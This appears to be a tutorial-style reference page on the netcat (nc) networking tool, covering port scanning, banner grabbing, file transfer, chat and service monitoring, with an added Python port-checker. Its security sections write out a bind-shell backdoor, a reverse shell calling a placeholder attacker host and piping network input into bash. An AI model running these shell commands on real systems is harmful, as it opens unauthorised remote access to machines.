nc (netcat)
Overview
The nc (netcat) command is a versatile networking utility that can read and write data across network connections using TCP or UDP protocols. It’s often called the “Swiss Army knife” of networking tools.
Syntax
nc [options] [hostname] [port]
nc -l [options] [port]
Common Options
Option | Description |
---|---|
-l | Listen mode |
-p port | Specify port |
-u | UDP mode |
-v | Verbose output |
-n | Don’t resolve hostnames |
-z | Zero-I/O mode (port scanning) |
-w timeout | Connection timeout |
-k | Keep listening after disconnect |
-4 | IPv4 only |
-6 | IPv6 only |
-e program | Execute program |
-c command | Execute command |
Key Use Cases
- Port scanning
- Network debugging
- File transfers
- Chat/messaging
- Service testing
- Backdoor creation
- Network troubleshooting
Examples with Explanations
Example 1: Port Scanning
nc -zv google.com 80
Tests if port 80 is open on Google
Example 2: Listen on Port
nc -l 8080
Listens for connections on port 8080
Example 3: Connect to Service
nc localhost 22
Connects to SSH service on localhost
Example 4: File Transfer
# Receiver
nc -l 9999 > received_file.txt
# Sender
nc target_host 9999 < file_to_send.txt
Port Scanning
Single port:
nc -zv host 80
Port range:
nc -zv host 20-25
Multiple ports:
nc -zv host 22 80 443
Network Testing
Test connectivity:
nc -zv -w 3 host port
Banner grabbing:
nc host 80
GET / HTTP/1.0
(type the request line after the connection opens, then press Enter twice; the empty line ends the HTTP headers and the server’s response header reveals the banner)
Service testing:
echo "QUIT" | nc mail.server.com 25
File Transfer
Send file:
# Receiver
nc -l 1234 > received.txt
# Sender
nc receiver_ip 1234 < file.txt
Directory transfer:
# Receiver
nc -l 1234 | tar -xzf -
# Sender
tar -czf - directory/ | nc receiver_ip 1234
Chat/Messaging
Simple chat:
# Server
nc -l 1234
# Client
nc server_ip 1234
Broadcast chat:
# Server with named pipe
mkfifo chat_pipe
nc -l 1234 < chat_pipe | tee chat_pipe
Advanced Usage
UDP mode:
nc -u host port
Keep listening:
nc -lk 1234
Execute commands:
nc -l 1234 -e /bin/bash # Security risk!
Performance Analysis
- Lightweight and fast
- Minimal resource usage
- Good for quick tests
- Efficient for simple transfers
- Low overhead networking
Best Practices
- Use for testing and debugging
- Be cautious with -e option
- Use timeouts for reliability
- Combine with other tools
- Consider security implications
Security Applications
Backdoor (educational):
# Target (dangerous!)
nc -l 1234 -e /bin/bash
# Attacker
nc target_ip 1234
Reverse shell:
# Attacker listens
nc -l 1234
# Target connects back
nc attacker_ip 1234 -e /bin/bash
Network Debugging
Test HTTP:
printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80
Test SMTP:
printf "EHLO test\r\nQUIT\r\n" | nc mail.server.com 25
Test DNS:
nc -u 8.8.8.8 53
Scripting Applications
Port availability check:
#!/bin/bash
check_port() {
    nc -z -w3 "$1" "$2" 2>/dev/null
    return $?
}
if check_port google.com 80; then
    echo "Port 80 is open"
fi
Service monitoring:
while true; do
    if ! nc -z localhost 80; then
        echo "Web server down!"
        # Restart service
    fi
    sleep 60
done
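As an added example (not part of the original page), the port-availability check and the monitoring loop above rewritten in Python so they run where nc is not installed: `check_port` mirrors `nc -z -w<timeout> host port` (complete the handshake, send nothing, close) and `parse_ports` accepts the `80`, `20-25` and `22 80 443` port specs from the Port Scanning section. Unlike the exit status of `nc -z`, it distinguishes a refused connection from one that timed out, which is the difference between a service that is down and a firewall silently dropping the probe; `local_listener` is a constructed fixture for exercising it on 127.0.0.1.

```python
import socket
from typing import Dict, List, Tuple

def parse_ports(spec: str) -> List[int]:
    """Expand nc-style port specs: "80", "20-25" or "22 80 443"."""
    ports: List[int] = []
    for token in spec.split():
        lo, _, hi = token.partition("-")
        start, end = int(lo), int(hi or lo)
        if not 0 < start <= end <= 65535:
            raise ValueError(f"bad port spec: {token!r}")
        ports.extend(range(start, end + 1))
    return ports

def check_port(host: str, port: int, timeout: float = 3.0) -> str:
    """Equivalent of `nc -z -w<timeout> host port`: complete the TCP
    handshake, send nothing, close. Returns "open", "closed" (RST /
    refused), "filtered" (no answer before the timeout, typical of a
    firewall drop) or "error" (DNS failure, unreachable network, ...)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    except OSError:
        return "error"

def scan(host: str, spec: str, timeout: float = 3.0) -> Dict[int, str]:
    """Like `nc -zv host 20-25`: one status per port in the spec."""
    return {p: check_port(host, p, timeout) for p in parse_ports(spec)}

def services_down(targets: List[Tuple[str, int]], timeout: float = 3.0) -> List[Tuple[str, int]]:
    """One pass of the monitoring loop: every host:port that is not open."""
    return [(h, p) for h, p in targets if check_port(h, p, timeout) != "open"]

def local_listener() -> Tuple[socket.socket, int]:
    """Constructed test fixture: throwaway listener on 127.0.0.1, port chosen by the OS."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]

if __name__ == "__main__":
    # Same targets as the page's "nc -zv host 22 80 443" example, against localhost.
    for port, state in scan("localhost", "22 80 443", timeout=1.0).items():
        print(f"localhost:{port} {state}")
```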
File Operations
Backup over network:
# Backup server
nc -l 9999 | gzip -d > backup.tar
# Source server
tar -cf - /data | gzip | nc backup_server 9999
Remote command execution:
# Command server
nc -l 1234 | bash
# Client
echo "ls -la" | nc server_ip 1234
Integration Examples
With SSH tunneling:
ssh -L 8080:internal_server:80 gateway_server
nc localhost 8080
With cron for monitoring:
# Check service every 5 minutes
*/5 * * * * nc -z localhost 80 || echo "Service down" | mail admin
Troubleshooting
- Connection refused
- Timeout issues
- Firewall blocking
- Permission problems
- Protocol mismatches
Security Considerations
- Never use -e in production
- Firewall implications
- Unencrypted communications
- Potential for abuse
- Monitor usage carefully
Modern Alternatives
For enhanced functionality:
1. socat - More features
2. nmap - Better port scanning
3. ssh - Secure connections
4. curl - HTTP operations
5. openssl s_client - SSL testing
Platform Differences
Different nc implementations:
- GNU netcat
- OpenBSD netcat
- Ncat (Nmap project)
- Traditional netcat
Check version:
nc -h 2>&1 | head -1